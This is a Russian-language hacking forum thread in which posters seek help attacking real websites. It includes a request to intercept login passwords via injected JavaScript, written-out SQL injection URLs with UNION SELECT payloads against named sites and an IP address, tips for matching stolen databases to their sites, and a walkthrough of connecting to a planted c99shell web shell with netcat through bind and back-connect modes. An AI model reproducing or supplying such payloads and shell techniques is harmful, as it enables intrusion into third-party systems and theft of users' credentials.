Всем привет! На сайте получил возможность добавлять/изменять новости... возможно ли при помощи js(или еще чего) перехватить какнить вводимые логин и пасс из формы входа??? Куки в принципе не интересуют! ..нужен сам пасс, мб к мылу подойдет и т.п.
http://www.securitylab.ru/contest/212101.php https://rdot.org/forum/showthread.php?t=32 https://rdot.org/forum/showthread.php?t=503
вот еще накапал... http://oldtitan.ja.org/challenge.php?page=rules&id=22'+union+all+select+1,2,3,'str1','str2',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+INFORMATION_SCHEMA.COLUMNS+--+ http://oldtitan.ja.org/area_admin.php?=id3 без успеха...
http://188.230.77.4:80/src/damagetypes.php?id=%bf'%bf" помогите раскрутить иньекцию. Вообщем сканерюга выдает ошибку SQL, но UNION , ORDER BY и GROUP BY не работают, и база даных реагирует только на кирилицу и только тогда виплевывает ошыбку, может кто то что то подскажет потому что я уже мозги сломал.
В общем вопрос следующий , существуют ли таблицы в бд популярных движков (vbulletin,phpbb3,joomla etc ) по которым можно определить ссылку на принадлежащий им сайты , например в wordpress в таблице wp_posts есть колонка gid в которую пишутся линки на посты а значит и на сам сайт . Просто бывают случаи когда юзер админ и доступны десятки бд и хрен определишь принадлежащие им сайты если хостятся по соседству >100 проектов а название бд ничего не дает и выглядит примерно так - "dv200321dsd" .
в форумах я ищу название форумов и топиков, потом по гуглу ищу, в других кмс таким же макаром ищу что нибудь индивидуальное для сайта что бы ссузить список поиска, еще вывожу мыло админа, часто мыла на том же домене что и сайт...вариантов много...
http://forum.antichat.ru/showthread.php?p=2343252 какие способы хочешь? в статях все нормально написано и описано.. если не понял- читай еще раз не понимаю я вас...
как подобные скули крутить? и чем вызвано сиё странное поведение? http://www.razda4a.ru/?news=12+order+by+5--
Подскажите в веб шелл есть Binding port: Открыл доступ говорит Binding... ok! Connect to :123123! You should use NetCat©, run "nc -v 123123"! Как его заюзать если линукса нету (винда) и по какому ip адресу коннектится? (по имени домена?)
nc -v xxx.com 123123 xxx.com [xxx.xxx.xxx.xxxx] 123123 (?): connection refused nc -v xxx.com:123123 xxx.com:123123: forward host lookup failed: h_errno 11004: NO_DATA подскажите как его использовать если можно примерчик, там еще пасс есть, что я делаю не так?
все понял надо было через Using С, а я делал через Using Perl welcome to c99shell /bin/bash: not found в веб шелл напечатал echo $PATH вышло /sbin:/bin:/usr/sbin:/usr/bin подскажите что сделать?
я чо то не понимаю тебя, ты откуда запускаеш неткат? шелл то тут причем, открыл порт через шелл, щас забудь о шелле , открой неткат и каннектись
Так и сделал все отлично законнектилось (попросил пасс, ввел его) дальше пишет welcome to c99shell /bin/bash: not found на винде в консоле которую nc запускал и дальше висит Через Back connection: пришлось делать спасибо большое за ответы
